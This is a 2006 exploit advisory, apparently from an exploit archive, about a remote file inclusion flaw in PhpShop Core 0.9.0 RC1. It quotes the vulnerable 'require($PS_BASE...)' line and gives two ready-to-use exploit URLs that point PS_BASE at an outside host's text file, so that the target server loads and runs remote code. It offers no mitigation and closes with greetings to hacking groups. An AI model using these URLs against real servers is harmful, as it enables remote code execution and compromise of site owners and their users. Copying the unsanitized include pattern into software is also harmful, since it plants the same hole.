PhpShop Core <= 0.9.0 RC1 (PS_BASE) File Include Vulnerabilities

2006-10-28 00:00:00

--------------------------------------|| Viva Palestine ||-----------------------------------------

PhpShop-Core (append.php) Remot File Include Vulnerability

Found By : CoLd Zero [ Wasem898 ]

Source : include_once ($4AZHAR_TeAM."Securty.");

PalesTine Arab Muslim Hacker's

######################################################
#
# PhpShop-Core v0.9.0 RC1
#
# Class: Remote File Include Vulnerability
# Published 2006-10-27
# Remote: Yes
# Type: Dangerous
# Site: http://www.comscripts.com/jump.php?action=script&id=81
#
# Author: Cold Zero
# Contact: [email protected]
#
######################################################


file ;

/core/html/append.php
/core/demo/append.php

==========================

Vuln Code

<?php
//
// This footer information must be on every page!
require($PS_BASE."modules/core/lib/ps_page_close.inc");

?>
======================================================

Exploit :

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/demo/append.php?PS_BASE=http://www.human2human.org/cold.txt?

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/html/append.php?PS_BASE=http://www.human2human.org/cold.txt?

---- Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageeb]

---- GreeTz: AlL : 4azhar.Com Members , All Xp10.com Members , Lezr.com Member , xhahax.org Members , Hack1h.com Members : Dm3r7.com Members

--------------------------------------|| Viva Palestine ||-----------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.